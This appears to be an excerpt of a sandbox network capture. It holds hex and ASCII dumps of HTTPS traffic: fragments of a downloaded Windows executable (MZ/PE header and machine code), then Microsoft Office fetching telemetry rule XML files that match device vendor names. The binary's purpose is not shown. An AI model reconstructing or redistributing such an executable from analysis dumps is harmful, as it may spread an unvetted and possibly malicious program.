                                                                                                      2024-10-08 18:51:25 UTC692INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 15 00 20 5f 0d 60 00 0e 41 00 66 5e 00 00 f0 00 26 00 0b 02 02 22 00 d0 29 00 00 36 34 00 00 f6 15 00 b0 14 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 57 00 00 06 00 00 3b 75 4c 00 02 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd _`Af^&")64@W;uL
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: 00 26 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e0 33 00 00 00 70 49 00 00 34 00 00 00 3a 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 80 00 00 00 00 b0 49 00 00 02 00 00 00 6e 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 49 00 00 02 00 00 00 70 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 88 b0 00 00 00 d0 49 00 88 b0 00 00 00 72 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 ac 16 00 00 00 90 4a 00 00 18 00 00 00 24 34 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 50 11 00 00 00 b0 4a 00 00 12 00 00 00 3c 34 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: &3@0@.idata3pI4:3@0.CRTIn3@@.tlsIp3@@.rsrcIr3@0.relocJ$4@0B/4PJ<4
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: 00 00 c7 05 ef 3d 33 00 01 00 00 00 8b 06 83 f8 01 0f 84 18 02 00 00 85 ed 0f 84 31 02 00 00 48 8b 05 4d 67 30 00 48 8b 00 48 85 c0 74 0c 45 31 c0 ba 02 00 00 00 31 c9 ff d0 e8 f4 00 29 00 48 8d 0d 9d 06 29 00 ff 15 8f 6d 49 00 48 8b 15 a0 67 30 00 48 89 02 e8 98 05 29 00 48 8d 0d 91 fd ff ff e8 dc be 29 00 e8 b7 fe 28 00 48 8b 05 20 67 30 00 48 89 05 d9 2f 48 00 e8 e4 be 29 00 48 8b 00 31 c9 48 85 c0 75 1c eb 5f 0f 1f 84 00 00 00 00 00 84 d2 74 2c 83 e1 01 74 27 b9 01 00 00 00 48 83 c0 01 0f b6 10 80 fa 20 7e e6 41 89 c8 41 83 f0 01 80 fa 22 41 0f 44 c8 eb e4 66 0f 1f 44 00 00 84 d2 75 11 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 80 fa 20 7f 0b 48 83 c0 01 0f b6 10 84 d2 75 f0 48 89 05 71 2f 48 00 44 8b 07 45 85 c0 74 16 f6 44 24 5c 01 b8 0a 00 00 00 0f 85 f1
                                                                                                      Data Ascii: =31HMg0HHtE11)H)mIHg0H)H)(H g0H/H)H1Hu_t,t'H ~AA"ADfDuf. HuHq/HDEtD$\
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: f1 84 00 00 eb 72 c7 44 24 20 01 00 00 00 4c 8d 4b 12 4c 8d 43 10 48 89 c1 e8 2d c8 03 00 48 89 03 48 85 c0 74 4a 4c 8b 44 24 38 c6 43 14 01 48 8d 4b 15 4c 89 e2 4c 89 43 08 e8 eb b1 04 00 48 8b 05 a4 6c 30 00 48 3b 98 60 05 00 00 75 15 48 8b 54 24 38 4c 89 a0 68 05 00 00 48 89 90 70 05 00 00 eb 08 4c 89 e1 e8 a6 b1 29 00 b0 01 eb 0a 4c 89 e1 e8 9a b1 29 00 31 c0 48 83 c4 40 5b 5e 41 5c c3 41 56 41 55 41 54 57 53 48 83 c4 80 31 c0 41 b9 40 00 00 00 48 89 cb 48 8d 7c 24 42 b9 3e 00 00 00 49 89 d5 f3 aa 48 89 5c 24 20 4c 8d 64 24 32 4d 89 c6 4c 89 e1 4c 8d 05 da 57 2a 00 ba 4e 00 00 00 48 c7 44 24 32 00 00 00 00 48 c7 44 24 3a 00 00 00 00 e8 0e fd ff ff 4c 89 e1 41 b8 0a 00 00 00 31 d2 e8 5e 40 00 00 49 89 c4 48 85 c0 75 28 e8 f1 83 00 00 83 f8 02 7e 3d 49
                                                                                                      Data Ascii: rD$ LKLCH-HHtJLD$8CHKLLCHl0H;`uHT$8LhHpL)L)1H@[^A\AVAUATWSH1A@HH|$B>IH\$ Ld$2MLLW*NHD$2HD$:LA1^@IHu(~=I
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: 00 4c 89 4c 24 58 4c 8d 4c 24 58 4c 89 4c 24 28 e8 cc 1e 29 00 48 83 c4 38 c3 41 54 48 81 ec 90 00 00 00 41 b9 40 00 00 00 49 89 c8 41 89 d4 48 8d 4c 24 47 ba 49 00 00 00 4c 89 44 24 20 4c 8d 05 cc 54 2a 00 48 89 4c 24 38 e8 a2 ff ff ff 45 84 e4 48 8b 4c 24 38 74 27 41 b8 0b 00 00 00 31 d2 e8 8b 3b 00 00 49 89 c4 48 85 c0 74 22 41 b8 02 00 00 00 31 d2 48 89 c1 e8 33 ac 29 00 eb 10 41 b8 01 00 00 00 31 d2 e8 64 3b 00 00 49 89 c4 4c 89 e0 48 81 c4 90 00 00 00 41 5c c3 41 56 41 55 41 54 53 48 83 ec 28 49 89 d5 ba 01 00 00 00 4d 89 c6 e8 62 ff ff ff 49 89 c4 48 85 c0 75 1e e8 cc 7e 00 00 ff c8 7e 5c 48 8d 15 4e 54 2a 00 48 8d 0d 4e 54 2a 00 e8 c0 7e 00 00 eb 47 45 31 c0 31 d2 48 89 c1 e8 f6 1b 29 00 41 b8 02 00 00 00 31 d2 4c 89 e1 e8 e6 1b 29 00 4c 89 e1 e8
                                                                                                      Data Ascii: LL$XLL$XLL$()H8ATHA@IAHL$GILD$ LT*HL$8EHL$8t'A1;IHt"A1H3)A1d;ILHA\AVAUATSH(IMbIHu~~\HNT*HNT*~GE11H)A1L)L
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: 24 40 48 89 44 24 50 e8 7c 17 29 00 4c 89 e1 e8 c4 18 29 00 4c 8b 7c 24 50 48 89 c6 e9 5b fe ff ff 4c 89 e1 e8 97 a7 29 00 48 85 ff 74 08 48 8b 44 24 40 48 89 07 4c 89 e8 48 81 c4 98 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 41 56 41 55 41 54 53 48 83 ec 28 48 89 d3 ba 01 00 00 00 4d 89 c5 4d 89 ce e8 56 fa ff ff 49 89 c4 48 85 c0 75 1e e8 c0 79 00 00 ff c8 7e 72 48 8d 15 b5 51 2a 00 48 8d 0d b8 51 2a 00 e8 b4 79 00 00 eb 5d 45 31 c0 48 89 da 48 89 c1 e8 e9 16 29 00 85 c0 74 2c e8 90 79 00 00 ff c8 7e 16 49 89 d8 48 8d 15 4a 4f 2a 00 48 8d 0d ab 51 2a 00 e8 81 79 00 00 4c 89 e1 45 31 e4 e8 f3 a6 29 00 eb 1f 4d 89 e1 41 b8 01 00 00 00 4c 89 f2 4c 89 e9 e8 5d a6 29 00 4c 89 e1 41 b4 01 e8 d2 a6 29 00 44 89 e0 48 83 c4 28 5b 41 5c 41 5d 41 5e c3 41 54
                                                                                                      Data Ascii: $@HD$P|)L)L|$PH[L)HtHD$@HLH[^_]A\A]A^A_AVAUATSH(HMMVIHuy~rHQ*HQ*y]E1HH)t,y~IHJO*HQ*yLE1)MALL])LA)DH([A\A]A^AT
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: 75 05 45 31 c0 31 d2 4c 89 e1 e8 6b 56 00 00 4c 89 e1 e8 22 55 00 00 b0 01 48 83 c4 20 41 5c c3 41 54 53 48 83 ec 28 45 31 e4 48 89 cb 48 89 d1 e8 b7 5b 00 00 48 85 c0 74 22 44 8a a0 a9 00 00 00 45 84 e4 74 16 0f b7 53 02 44 0f b6 40 60 45 31 c9 b9 25 00 00 00 e8 5e e6 00 00 44 89 e0 48 83 c4 28 5b 41 5c c3 41 54 57 56 53 48 83 ec 28 4d 63 e0 48 89 cb 44 89 44 24 60 48 89 d6 4c 89 e1 e8 29 a1 29 00 49 89 c1 48 85 c0 74 20 48 89 c7 4c 89 e1 0f b7 53 02 44 8b 44 24 60 f3 a4 b9 26 00 00 00 41 b4 01 e8 0e e6 00 00 eb 1f e8 2c 74 00 00 45 31 e4 ff c8 7e 13 48 8d 15 d2 4d 2a 00 48 8d 0d a9 4d 2a 00 e8 1d 74 00 00 44 89 e0 48 83 c4 28 5b 5e 5f 41 5c c3 90 90 90 90 90 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 38 45 31 e4 83 bc 24 a0 00 00 00 00 89 d3 4d 89 c5
                                                                                                      Data Ascii: uE11LkVL"UH A\ATSH(E1HH[Ht"DEtSD@`E1%^DH([A\ATWVSH(McHDD$`HL))IHt HLSDD$`&A,tE1~HM*HM*tDH([^_A\AWAVAUATUWVSH8E1$M
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: 39 eb 32 e8 7e 6f 00 00 48 8d 15 97 49 2a 00 48 8d 0d af 4a 2a 00 83 f8 06 7e 1f eb 18 e8 64 6f 00 00 83 f8 06 7e 13 48 8d 15 78 49 2a 00 48 8d 0d b4 4a 2a 00 e8 57 6f 00 00 ba 98 04 00 00 b9 01 00 00 00 e8 e5 9c 29 00 49 89 c1 48 85 c0 75 23 e8 30 6f 00 00 ff c8 7e 3f 48 8d 15 45 49 2a 00 48 8d 0d a2 4a 2a 00 48 83 c4 20 5b 5e 5f e9 1d 6f 00 00 48 89 c7 48 89 de b9 26 01 00 00 0f b7 53 30 f3 a5 45 31 c0 b9 0e 00 00 00 48 83 c4 20 5b 5e 5f e9 d0 aa 03 00 48 83 c4 20 5b 5e 5f c3 41 55 41 54 57 53 48 83 ec 28 41 89 cc 41 89 d5 e8 d0 6e 00 00 83 f8 04 7e 19 45 89 e9 45 89 e0 48 8d 15 de 48 2a 00 48 8d 0d 97 4a 2a 00 e8 bd 6e 00 00 44 89 ea 44 89 e1 e8 64 fd ff ff 48 89 c3 48 85 c0 75 2a e8 9a 6e 00 00 ff c8 0f 8e 94 00 00 00 48 8d 15 ab 48 2a 00 48 8d 0d 90
                                                                                                      Data Ascii: 92~oHI*HJ*~do~HxI*HJ*Wo)IHu#0o~?HEI*HJ*H [^_oHH&S0E1H [^_H [^_AUATWSH(AAn~EEHH*HJ*nDDdHHu*nHH*H
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: 48 83 c9 ff 48 89 d7 48 c7 85 40 04 00 00 00 00 00 00 f2 ae 48 f7 d1 4c 8d 4c 0a ff 4c 8b ad 40 04 00 00 41 8a 51 ff 49 8d 49 ff 49 8d 45 01 80 fa 5c 74 11 80 fa 2f 74 0c 48 89 85 40 04 00 00 49 89 c9 eb d7 48 89 85 40 04 00 00 49 83 c5 02 b9 01 00 00 00 4c 89 ea 4c 89 4c 24 28 e8 73 97 29 00 4c 8b 4c 24 28 48 85 c0 48 89 85 38 04 00 00 48 89 c1 75 20 48 8d 0d ba 47 2a 00 4d 89 e8 48 8d 15 c6 43 2a 00 e8 ac 69 00 00 b9 02 00 00 00 e8 27 97 29 00 4c 8d 05 c8 47 2a 00 4c 89 ea e8 28 f8 ff ff 48 c7 85 58 04 00 00 00 00 00 00 48 c7 85 78 04 00 00 00 00 00 00 48 c7 85 88 04 00 00 00 00 00 00 44 89 e0 48 81 c4 d0 08 00 00 5e 5f 5d 41 5c 41 5d c3 41 54 48 81 ec 20 04 00 00 4c 8d 64 24 20 4c 89 e2 e8 ac fc ff ff 84 c0 74 4e e8 36 69 00 00 83 f8 04 7e 16 4d 89 e0
                                                                                                      Data Ascii: HHH@HLLL@AQIIIE\t/tH@IH@ILLL$(s)LL$(HH8Hu HG*MHC*i')LG*L(HXHxHDH^_]A\A]ATH Ld$ LtN6i~M
                                                                                                      2024-10-08 18:51:25 UTC1369INData Raw: ef 00 00 00 83 ff 02 0f 84 1c 01 00 00 85 ff 0f 85 70 01 00 00 e8 ba 64 00 00 83 f8 06 7e 19 41 89 f1 41 89 d8 48 8d 15 c8 3e 2a 00 48 8d 0d b5 44 2a 00 e8 a7 64 00 00 41 8b 44 24 30 83 f8 03 74 1c 77 07 83 f8 02 74 41 eb 1e 83 e8 04 83 f8 01 77 16 41 c7 44 24 30 01 00 00 00 eb 2c 41 c7 44 24 30 02 00 00 00 eb 21 e8 66 64 00 00 ff c8 7e 18 45 8b 44 24 30 48 8d 15 76 3e 2a 00 48 8d 0d 8b 44 2a 00 e8 55 64 00 00 ba 98 04 00 00 b9 01 00 00 00 e8 e3 91 29 00 49 89 c1 48 85 c0 75 29 e8 2e 64 00 00 ff c8 0f 8e d7 00 00 00 48 8d 15 3f 3e 2a 00 48 8d 0d 9c 3f 2a 00 48 83 c4 28 5b 5e 5f 41 5c e9 15 64 00 00 48 89 c7 4c 89 e6 b9 26 01 00 00 45 31 c0 f3 a5 b9 0e 00 00 00 41 0f b7 54 24 30 48 83 c4 28 5b 5e 5f 41 5c e9 c4 9f 03 00 e8 dc 63 00 00 83 f8 06 7e 19 41 89
                                                                                                      Data Ascii: pd~AAH>*HD*dAD$0twtAwAD$0,AD$0!fd~ED$0Hv>*HD*Ud)IHu).dH?>*H?*H([^_A\dHL&E1AT$0H([^_A\c~A


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      33192.168.2.74974013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:25 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:25 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:25 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 472
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                      x-ms-request-id: b27116a7-a01e-003d-3a00-1798d7000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185125Z-1657d5bbd48t66tjar5xuq22r8000000059g00000000snnu
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      34192.168.2.74973813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:25 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:25 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:25 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 420
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                      x-ms-request-id: 10df1352-f01e-00aa-105a-178521000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185125Z-1657d5bbd48tqvfc1ysmtbdrg0000000058g00000000d1zd
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:25 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      35192.168.2.74974213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:25 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:25 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:25 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 423
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                      x-ms-request-id: a2d01d3c-801e-0083-4800-17f0ae000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185125Z-1657d5bbd48q6t9vvmrkd293mg000000058g00000000xqdt
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:25 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      36192.168.2.74973913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:25 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:25 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:25 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 427
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                      x-ms-request-id: a62739ea-301e-005d-6402-17e448000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185125Z-1657d5bbd48brl8we3nu8cxwgn00000005rg000000009kzy
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      37192.168.2.74974113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:25 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:25 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:25 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 486
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                      x-ms-request-id: b8f8ddc8-601e-0001-115a-17faeb000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185125Z-1657d5bbd487nf59mzf5b3gk8n00000004wg000000011g7y
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:25 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      38192.168.2.74974313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:26 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:26 UTC470INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:26 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 478
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                      x-ms-request-id: 4dd19665-401e-005b-7705-179c0c000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185126Z-1657d5bbd48sqtlf1huhzuwq700000000560000000005zgw
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
